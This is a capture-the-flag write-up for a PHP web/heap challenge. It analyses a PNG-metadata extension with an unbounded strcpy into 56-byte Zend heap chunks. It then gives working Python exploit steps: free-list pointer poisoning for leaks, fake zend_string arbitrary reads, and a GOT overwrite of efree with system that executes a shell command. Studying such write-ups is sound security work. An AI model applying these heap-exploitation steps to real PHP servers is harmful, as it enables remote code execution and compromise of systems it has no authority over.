Under The Web
- Category: Web-Pwn
- Vuln type: Heap
- Description: Dive deep under the web’s surface, where "L" in LFI stands for "LEAK". Will you conquer the depths and claim victory?
This writeup covers my solution to the Under The Web challenge (Web-Pwn / Heap).
The intended path for exploitation involved abusing a Local File Inclusion (LFI) bug in the PHP application to leak process memory mappings (e.g., /proc/self/maps
) and break ASLR before pivoting into the heap vulnerablity.
However, I managed to solve the challenge with an unintended approach, I completely ignored the LFI and instead performed a bit of heap feng shui inside Zend’s custom allocator (ZMM). By controlling how metadata chunks were allocated and freed, I was able to reliably exploit the heap overflow vulnerability directly, obtaining RCE without needing external memory leaks.
The challenge
In this challenge we are presented with a PHP web application that relies on a custom PHP extension called metadata_reader.so
.
The application allows us to upload and view any png image from the following endpoints:
- POST upload.php
- GET view.php?image=uploads/image.png
The vulnerable extension is responsible for parsing PNG metadata fields such as Title
, Author
, Copyright
, and then displaying them back in the response together with the image.
Binary analysis
The function zif_getImgMetadata
is the PHP extension entrypoint used to extract metadata from a PNG file and return it to the PHP userland. It relies on libpng for parsing PNG structures, but allocates its own internal buffers via the Zend custom allocator (_emalloc
, _efree
). Below is a breakdown of its key components:
1. Argument Parsing
if (next == 1) {
if (LOBYTE(execute_context[1].call) == 6) {
// type check: string
opline = execute_context[1].opline;
} else {
// fallback: zend_parse_arg_str_slow
}
file_name = (const char *)&opline->lineno;
}
- The function expects exactly one string argument: the PNG file path.
- No further validation is performed beyond type checking.
2. PNG Initialization
stream = fopen(file_name, "rb");
png_ptr = png_create_read_struct();
info_struct = png_create_info_struct(png_ptr);
png_read_info(png_ptr, info_struct);
- A file stream is opened.
- Standard
libpng
structures (png_ptr
andinfo_struct
) are initialized. png_read_info
populates metadata structures from the PNG.
3. Metadata Extraction Loop
if (png_get_text(png_ptr, info_ptr, &metadata->text_ptr, &txt_entries_found) > 0) {
while (...) {
text_entry = &metadata->text_ptr[i];
key = text_entry->key;
...
}
}
png_get_text
retrieves embedded textual metadata entries.- The extension loops over text chunks and looks for specific keys:
"Title"
,"Artist"
,"Copyright"
4. Vulnerable Allocation & Copy
heap_pointer = (char *)_emalloc_56();
metadata->Artist = heap_pointer;
strcpy(heap_pointer, text_entry->text);
-
For each recognized key, the code:
-
Allocates a fixed 56-byte buffer using
_emalloc_56()
. - Copies the user-controlled string from the PNG metadata into it with
strcpy
. - No bounds check is performed: if the metadata string exceeds 55 bytes, it overflows into adjacent Zend heap chunks, corrupting memory.
5. Output Formatting
Every single one of these pointer is saved in this custom struct named MetaData
struct MetaData { // total size = 0x38
char *Artist; // allocated via _emalloc(56)
char *Title; // allocated via _emalloc(56)
char *Copyright; // allocated via _emalloc(56)
char *PngName; // file path string
png_structp png_ptr; // libpng internal struct
png_infop info_ptr; // libpng info struct
png_textp text_ptr; // array of text chunks from the PNG
};
- After extraction, the function constructs a fixed 256-byte stack buffer with the values.
- Each allocated metadata buffer is freed after being printed (
_efree
).
ap_php_snprintf(v21, v20, "Title: %s\n", Title);
_efree(metadata->Title);
ap_php_snprintf(v25, v24, "Artist: %s\n", Artist);
_efree(metadata->Artist);
ap_php_snprintf(v29, v28, "Copyright: %s\n", Copyright);
_efree(metadata->Copyright);
Key Problems
There are several problems with this implementation:
-
If at least one of the expected metadata keys is missing from the PNG, the corresponding field in the custom
MetaData
struct is never initialized. This leaves the pointer containing whatever stale value happens to be in that slot of the Zend heap. When the code later attempts to use or free this uninitialized pointer, it leads to undefined behavior — which explains why the server crashes when uploading a normal PNG without metadata. -
Since the code does not enforce uniqueness of metadata keys, the same tag (e.g.,
Artist
,Title
, orCopyright
) can appear multiple times in the PNG. Each occurrence triggers a new allocation, meaning an attacker can force the program to allocate an arbitrary number of heap chunks. -
The code allocates a fixed-size buffer (56 bytes) for each metadata entry. It then performs an unbounded
strcpy
from user-controlled PNG text fields. This leads to heap buffer overflows inside Zend’s custom memory allocator.
Understanding Zend Memory Allocation
To reliably exploit the metadata vulnerability, it’s essential to understand how Zend’s custom memory allocator organizes and manages heap memory.
Zend uses a custom memory allocator that manages memory differently from standard malloc
. Memory is divided into large contiguous “chunks” of 2 MB. Each chunk is further subdivided into pages, and each page is assigned to a bucket.
Buckets in Zend are analogous to free bins in libc: each bucket holds a series of continuous fixed-size blocks. There are 30 buckets in total, with block sizes ranging from 8 bytes up to 3072 bytes. When a request for memory is made, the allocator selects the smallest suitable bucket and returns a block from that bucket. If the bucket is empty, a new page is allocated from a chunk, assigned to a single bucket, and divided into blocks of the same size.
Runtime memory state
We can verify Zend’s allocation strategy by observing the zend heap section after processing a PNG image with deliberately crafted metadata. To do this I'm uploading a normal image altered using python's Pillow library
def upload_image(metadata):
with Image.open("original.png") as img:
meta = PngImagePlugin.PngInfo()
for key in metadata.keys():
meta.add_text(key.strip(), metadata[key])
buf = io.BytesIO()
img.save(buf, format="PNG", pnginfo=meta)
buf.seek(0)
files = {"file": ("image.png", buf, "image/png")}
resp = requests.post("http://localhost:8000/upload.php", files=files)
return resp.content
data = upload_image({"Title":"A"*55, "Artist":"B"*55, "Copyright":"C"*55})
From the following dump we can clearly identify the MetaData
structure, which contains 7 pointers.
The first three pointers refer to the heap blocks where the PNG strings (Title
, Artist
, Copyright
) were copied.
As expected, all of these chunks were allocated in the same memory page and very close to each other. This happens because they were requested from the same bucket, given that they all have the same size (56 bytes). In fact, all blocks within a given page must have that exact size, since Zend assigns each page to a single bucket.
In the next image, we can even observe the free blocks available for allocation. Each free block stores, in its first 8 bytes, a pointer to the next free block of the same size — forming a free list.
Because of this design, each element in the chain does not need a size header, only the forward pointer (fd
), since all blocks are guaranteed to be of the same size.
However, this configuration is also dangerous from a security perspective, as very few consistency checks can be performed. We can confirm this by looking at the implementation of zend_mm_alloc_small
, the function responsible for serving allocations from small bins.
The code shows that if a free block is available in the requested bin, the allocator simply takes the pointer from heap->free_slot[bin_num]
, updates the list head with the next_free_slot
, and then directly returns that pointer to the caller. There are no checks to validate whether the pointer is legitimate, whether it actually belongs to the current heap, or even whether it points to properly allocated memory.
static zend_always_inline void *zend_mm_alloc_small(zend_mm_heap *heap, int bin_num ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
ZEND_ASSERT(bin_data_size[bin_num] >= ZEND_MM_MIN_USEABLE_BIN_SIZE);
#if ZEND_MM_STAT
do {
size_t size = heap->size + bin_data_size[bin_num];
size_t peak = MAX(heap->peak, size);
heap->size = size;
heap->peak = peak;
} while (0);
#endif
if (EXPECTED(heap->free_slot[bin_num] != NULL)) {
zend_mm_free_slot *p = heap->free_slot[bin_num];
heap->free_slot[bin_num] = zend_mm_get_next_free_slot(heap, bin_num, p);
return p;
} else {
return zend_mm_alloc_small_slow(heap, bin_num ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
}
This means that if we are able to overwrite the fd
(forward pointer) of a free block with an arbitrary address, the allocator will happily return that address on the next call to zend_mm_alloc_small
giving us arbitrary address allocation.
Exploit
Step 1: Leaking Zend Heap Pointer
We leak a pointer from the Zend heap by exploiting the allocation/free order (Title → Artist → Copyright
).
By overflowing just one byte (\x00
) from the Copyright
chunk into the Artist
chunk, we ensure that when Artist
is later allocated, it overwrites that byte with its content.
Since Artist
is freed before Copyright
, printing Copyright
without string termination reveals the Artist
block's Forward pointer (FD), giving us a raw Zend heap address.
data = upload_image({
"Title": "A" * 55,
"Copyright": "C" * 56, # overflow the \x00 into Artist
"Artist": "B" * 55
})
chunk_addr = int.from_bytes(
re.findall(br"C{10,}(.*?)(?=</p>)", data)[0], "little"
)
heap_addr = chunk_addr - 0x5b230
Step 2: Leaking PHP Binary and Libc Heap Addresses
With the Zend heap base known, we can now manipulate chunk allocations. By overflowing the first allocated chunk into the second chunk (yet to be allocated), we can overwrite its FD pointer, which controls where the third chunk will be placed.
Using tools like leakfind
, we can locate useful addresses present inside the zend heap.
pwndbg> leakfind 0x7f0e50e00000 --p heap -o 0x200000 -d1
0x7f0e50e00000+0x1028 —▸ 0x55cf70f880a0 [heap]
0x7f0e50e00000+0x31c0 —▸ 0x55cf70f88290 [heap]
0x7f0e50e00000+0x5208 —▸ 0x55cf71011f40 [heap]
0x7f0e50e00000+0x5210 —▸ 0x55cf71011e40 [heap]
0x7f0e50e00000+0x5218 —▸ 0x55cf71011a40 [heap]
0x7f0e50e00000+0x5220 —▸ 0x55cf7100ca60 [heap]
0x7f0e50e00000+0x15358 —▸ 0x55cf71043c00 [heap]
...
Instead of directly allocating over our target memory (which would destroy it), we place the chunk over the MetaData struct. This allows us to overwrite the first pointer in the struct (char *Artist;
), causing a read from the snprintf at that address.
metadata_struct = heap_addr + 0x59150
php_leak = heap_addr +0x590d8
data = upload_image({"Title":b"A"*56 + p64(metadata_struct) ,"Artist":"B"*55, "Copyright":p64(php_leak)[:-1]})
php_bin_leak = int.from_bytes( re.findall(br"Artist: (.*?)(?=</p>)",data)[0], "little")
php_addr = php_bin_leak - 0x55d380
print("php bin location: ",hex(php_addr))
In the same way we can leak the address of the libc_heap and the stack.
Step 3: Leaking Libc Address
At this point, we know the Zend heap base and we are able to leak the address of the PHP binary, Libc heap, Stack. However, unlike the previous leaks, there are no Libc pointers inside the Zend heap section. This poses a challenge: we cannot simply use the same trick of overwriting a MetaData
pointer and reading it via snprintf
outside the Zend heap.
The problem arises because immediately after printing a pointer with snprintf
, the program calls _efree
on that pointer. In Zend’s custom allocator, _efree
performs a minimal heap integrity check to ensure the pointer being freed belongs to a valid chunk before adding it to the free list:
#define _ZEND_BIN_FREE(_num, _size, _elements, _pages, _min_size, y) \
ZEND_API void ZEND_FASTCALL _efree_ ## _size(void *ptr) { \
ZEND_MM_CUSTOM_DEALLOCATOR(ptr); \
if (_size < _min_size) { \
_efree_ ## _min_size(ptr); \
return; \
} \
{ \
zend_mm_chunk *chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE); \
ZEND_MM_CHECK(chunk->heap == AG(mm_heap), "zend_mm_heap corrupted"); \
zend_mm_free_small(AG(mm_heap), ptr, _num); \
} \
}
Here, _efree
:
- Aligns the pointer to its containing 2 MB chunk.
- Checks that
chunk->heap
matches the current Zend heap (AG(mm_heap)
). - If the check fails, it triggers a heap corruption error.
This means we cannot directly print a pointer to arbitrary memory outside the Zend heap, because _efree
will detect that the chunk is invalid and crash the application.
To solve this, I looked for another strategy: instead of forcing Zend to print raw pointers outside the heap , I decided to stay entirely inside the Zend heap and leverage existing Zend data structures to leak arbitrary bytes.
When looking at the response formatting in in the php file index.php
:
<p><?= $data[0] ?></p>
<p><?= $data[1] ?></p>
<p><?= $data[2] ?></p>
we notice that our input is concatenated with constant HTML strings such as:
"</p>\n <p>"
If these constants are present in memory, they must be allocated as zend_string
objects — and sure enough, I found one in the Zend heap:
pwndbg> find 0x7f0e50e00000, +0x200000 , "</p>\n <p>"
0x7f0e50e04138
Dumping it shows the full _zend_string
metadata:
$4 = {
gc = { refcount = 1, u = { type_info = 86 } },
h = 9965324664382197394,
len = 16,
val = "</p>\n <p>"
}
So the constant HTML fragment lives in the heap as a _zend_string with a proper GC header.
The next step was to locate who references this string. By scanning for the pointer to 0x7f0e50e04120
, I found several hits, and inside one array-like structure there were multiple entries:
00007f0e50e8dbd0 00007f0e50e5b188 0000000000000006
00007f0e50e8dbe0 0000000000000000 0000000000000004
00007f0e50e8dbf0 00007f0e50e04120 0000000000000006
00007f0e50e8dc00 0000000000000001 0000000000000004
00007f0e50e8dc10 00007f0e50e04120 0000000000000006
00007f0e50e8dc20 0000000000000002 0000000000000004
00007f0e50e8dc30 00007f0e50e66640 0000000000000006
00007f0e50e8dc40 0000000000000001 0000000000000004
This looks exactly like a series of Bucket
entries from a zend_array
: each entry contains a pointer to a zval
and an integer indicating the type (6 is String in Zend). By overwriting those string pointers, I could make those entries point to any address inside the Zend heap, and PHP would happily print the contents — because from Zend’s point of view, it’s just another zend_string
.
This gave me a controlled arbitrary read primitive outside the Zend heap.
Constraints
- If we point outside the Zend heap we must make sure that the Garbage Collector never invokes the
_efree
(otherwise it will abort), to ensure this Thegc.refcount
field of our fake _zend_string must be well abouve 0 so the GC doesn’t reclaim the string. - The
len
field must be large enough to cover the bytes we want to leak.
As long as we align our fake zend_string
correctly (refcount high, len big enough), we can leak anything in memory.
I found a suitable location in the Libc heap with a len
large enough to leak a big chunk. This gave me both the libc base and the base address of metadata_reader.so
.
fake_zend_string = libc_heap + 0x290
entry_location = heap_addr + 0x8dbe0
data = upload_image({
"Title ": b"A"*56 + p64(entry_location+0x10),
"Artist ": b"B"*55,
"Copyright ": p64(fake_zend_string-0x18)[:-1],
"Copyright ": b"ciao"
})
libc_addr = int.from_bytes(data[1705:1713], "little") - 0x19f000
print("libc address:", hex(libc_addr))
metadata_bin = int.from_bytes(data[0xf6b39:0xf6b41], "little") - 0x3f30
print("metadata binary:", hex(metadata_bin))
Step 4: GOT Overwrite
With both bases leaked I overwrote the efree
entry in the GOT of metadata_reader.so
with system
.
system_addr = libc_addr + 0x4c3a0
efree_got = metadata_bin + 0x4090
data = upload_image({
"Artist": b"/"*56 + p64(efree_got),
"Title": b'/bin/bash -c "ls >> view.php"',
"Copyright": p64(system_addr)[:-1]
})
The command appended the filenames in the folder to view.php
, leaking the random flag file name. I then fetched it via LFI:
curl http://localhost:8000/view.php?image=9013e48b28a026976be69e7eba8f240e2c4c6d3fd0ed682abce6725ef2e788bd